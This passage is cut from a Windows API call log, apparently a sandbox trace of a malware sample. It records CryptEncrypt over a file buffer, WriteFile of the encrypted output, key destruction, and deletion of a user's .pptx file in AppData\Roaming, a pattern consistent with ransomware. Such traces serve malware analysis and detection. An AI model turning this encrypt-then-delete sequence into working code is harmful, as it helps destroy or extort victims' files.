lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0151.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0151.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0151.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0151.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0151.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0151.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa270, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0151.883] CryptEncrypt (in: hKey=0x9e20b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xad4f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xad50) returned 1 [0151.883] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.883] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.883] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.883] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.883] CharLowerBuffW (in: lpsz="byte[44368]", cchLength=0xb | out: lpsz="byte[44368]") returned 0xb [0151.883] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.885] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.886] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.886] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.886] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.886] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.886] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.886] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0151.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa4e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0151.886] CryptEncrypt (in: hKey=0x9e20b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ac4ec0*, pdwDataLen=0x8cef60*=0xad4f, dwBufLen=0xad50 | out: pbData=0x2ac4ec0*, pdwDataLen=0x8cef60*=0xad50) returned 1 [0151.887] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.888] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.888] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.888] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.888] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.906] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0151.907] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.907] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0151.907] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.907] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.907] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0151.907] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.907] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0151.907] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.907] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.907] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.907] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.907] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.907] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.907] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.907] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.907] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.907] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.907] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.907] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.912] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.912] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.912] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.913] WriteFile (in: hFile=0x4a4, lpBuffer=0x2a9a140*, nNumberOfBytesToWrite=0xad50, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a9a140*, lpNumberOfBytesWritten=0x8cf5e4*=0xad50, lpOverlapped=0x0) returned 1 [0151.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.914] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0151.914] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.914] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0151.915] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.915] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.915] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.915] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0151.915] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.915] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0151.915] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0151.915] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0151.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa2a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0151.915] CryptDestroyKey (hKey=0x9e20b8) returned 1 [0151.915] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.915] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.915] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0151.915] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.915] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0151.915] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.915] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.915] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0151.915] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0151.915] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0151.915] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0151.915] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0151.916] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0151.916] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.916] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.916] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0151.916] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.916] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0151.916] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0151.916] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.916] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.916] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.916] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.916] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.916] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0151.916] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.916] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0151.916] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.916] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.916] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0151.916] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.916] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0151.916] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.916] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.916] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.916] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.917] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.917] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0151.917] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.917] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0151.917] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0151.917] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.917] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.917] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.917] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.917] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.917] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.917] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0151.917] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.917] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0151.917] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.917] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.917] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0151.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7060, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0151.917] CryptReleaseContext (hProv=0x9bee68, dwFlags=0x0) returned 1 [0151.917] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.917] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.917] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.918] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.918] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.918] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.918] FreeLibrary (hLibModule=0x76390000) returned 1 [0151.918] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.918] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.918] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.918] CloseHandle (hObject=0x4f8) returned 1 [0151.919] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.919] CloseHandle (hObject=0x4a4) returned 1 [0151.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.926] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.927] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.927] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.927] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/V7-K_kNP-.pptx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\V7-K_kNP-.pptx", lpFilePart=0x8cedf4*="V7-K_kNP-.pptx") returned 0x2e [0151.927] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\V7-K_kNP-.pptx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\v7-k_knp-.pptx")) returned 0x20 [0151.927] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\V7-K_kNP-.pptx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe563b4e0, ftCreationTime.dwHighDateTime=0x1d5d41b, ftLastAccessTime.dwLowDateTime=0xe2e40150, ftLastAccessTime.dwHighDateTime=0x1d5ca77, ftLastWriteTime.dwLowDateTime=0xe2e40150, ftLastWriteTime.dwHighDateTime=0x1d5ca77, nFileSizeHigh=0x0, nFileSizeLow=0xad4f, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="V7-K_kNP-.pptx", cAlternateFileName="V7-K_K~1.PPT")) returned 0x9e20b8 [0151.927] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\V7-K_kNP-.pptx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\v7-k_knp-.pptx")) returned 1 [0151.947] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe563b4e0, ftCreationTime.dwHighDateTime=0x1d5d41b, ftLastAccessTime.dwLowDateTime=0xe2e40150, ftLastAccessTime.dwHighDateTime=0x1d5ca77, ftLastWriteTime.dwLowDateTime=0xe2e40150, ftLastWriteTime.dwHighDateTime=0x1d5ca77, nFileSizeHigh=0x0, nFileSizeLow=0xad4f, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="V7-K_kNP-.pptx", cAlternateFileName="V7-K_K~1.PPT")) returned 0 [0151.948] FindClose (in: hFindFile=0x9e20b8 | out: hFindFile=0x9e20b8) returned 1 [0151.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0151.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0151.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.949] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.949] 